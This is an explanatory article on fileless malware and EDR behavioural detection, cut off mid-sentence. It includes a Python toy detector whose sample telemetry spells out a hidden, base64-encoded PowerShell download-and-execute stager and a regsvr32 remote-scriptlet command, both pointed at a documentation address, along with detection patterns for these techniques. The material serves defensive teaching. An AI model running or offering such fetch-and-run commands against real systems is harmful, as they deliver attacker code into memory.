The Threat that Directly Loads Malicious Code into Memory
Cyber threat actors keep developing more sophisticated techniques to infect systems. The best-known method is delivering a malicious file, as an email attachment or a web download, that drops and runs malware on the victim's disk. In recent years, however, the industry has seen a sharp rise in a more complex form of attack: fileless malware. But what exactly is it?
Instead of installing a malicious executable on the victim's hard drive like traditional malware, fileless malware loads its malicious code directly into memory. It tends to use one of two entry vectors: either it exploits a vulnerability in a program the victim already uses to gain code execution, or it arrives as something that is never installed as a program, such as a script (PowerShell, VBScript or JavaScript, for instance) that a legitimate interpreter already present on the system runs. Once running, fileless malware often injects its code into the memory of existing, trusted processes. Because there is no executable file on disk to scan and the code lives inside a legitimate process, conventional file-scanning antivirus has great difficulty detecting it.
If such malware has already managed to get in, EDR solutions reduce detection and response time, and therefore recovery time, through their post-execution capabilities: rather than relying on a file to scan, they monitor what processes actually do (process creation, script execution, memory injection) and can act on that behaviour after the code has started running.
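To make the two entry vectors and the post-execution detection idea concrete, here is an added example (not code from the original article or from any EDR vendor): a small Python detector that scores constructed process-creation events for fileless indicators. It decodes PowerShell `-EncodedCommand` payloads (base64 of the UTF-16LE script), looks for download-and-invoke and reflective-loading patterns in the command line, flags script hosts spawned by Office processes, and flags a script-interpreting LOLBin (regsvr32) pointed at a remote scriptlet. The event schema (`parent`/`image`/`cmdline`), the indicator list and the sample events are all constructed for this demonstration; 192.0.2.10 is a documentation address.

```python
"""Toy detector for fileless-malware indicators in process-creation telemetry.

Added illustrative example, not code from the original article or from any
EDR vendor. The event schema (parent/image/cmdline), the indicator list and
the sample events are all constructed for this demonstration.
"""
import base64
import re
from dataclasses import dataclass
from typing import Callable, Optional

# PowerShell -EncodedCommand takes base64 of the UTF-16LE script; decoding it
# exposes the in-memory stage that never touches disk as a script file.
ENC_RE = re.compile(r"(?:-|/)e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _has(pattern: str) -> Callable[[str], bool]:
    rx = re.compile(pattern, re.I)
    return lambda text: rx.search(text) is not None


def _download_and_invoke(text: str) -> bool:
    # Either order: "IEX (...).DownloadString(...)" or "(...).DownloadString(...) | IEX"
    return bool(re.search(r"\b(IEX|Invoke-Expression)\b", text, re.I)
                and re.search(r"DownloadString|Net\.WebClient|Invoke-WebRequest|\biwr\b", text, re.I))


# Indicator checks run over the command line plus any decoded payload.
INDICATORS = [
    ("download_and_invoke", _download_and_invoke),
    ("reflective_assembly_load", _has(r"\[(System\.)?Reflection\.Assembly\]::Load\(")),
    ("hidden_window", _has(r"-(w|windowstyle)\s+hidden")),
    ("lolbin_remote_script", _has(r"\b(mshta|regsvr32|rundll32)(\.exe)?\b.*(https?://|scrobj\.dll|javascript:)")),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    event_id: int
    indicators: list
    decoded: Optional[str]


def analyze_event(ev: dict) -> Optional[Finding]:
    """Score one process-creation event; None means nothing suspicious was seen."""
    decoded = decode_encoded_command(ev["cmdline"])
    text = ev["cmdline"] + ("\n" + decoded if decoded else "")
    hits = ["encoded_command"] if decoded is not None else []
    hits += [name for name, check in INDICATORS if check(text)]
    # An Office process spawning a script host is the classic macro -> in-memory stage chain.
    if ev["parent"].lower() in OFFICE_PARENTS and ev["image"].lower() in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    return Finding(ev["id"], hits, decoded) if hits else None


def analyze(events) -> list:
    """Run the detector over a batch of events and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


# Constructed sample telemetry (192.0.2.10 is a documentation address, not a real host).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"id": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)},
    {"id": 3, "parent": "cmd.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll"},
    {"id": 4, "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {', '.join(f.indicators)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Events 1 and 4 are benign administration and produce no finding, even though event 4 bypasses the execution policy; event 2 (Office spawning a hidden, encoded PowerShell that downloads and evaluates a remote script) and event 3 (regsvr32 loading a remote scriptlet) are flagged. Note what this toy deliberately does not model: the injection of code into an already-running process is not visible on a command line at all and is exactly why real EDR products also collect memory and API-level telemetry.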
Although these techniques are not new, there has been exponential growth in cases since 2016 (in fact,…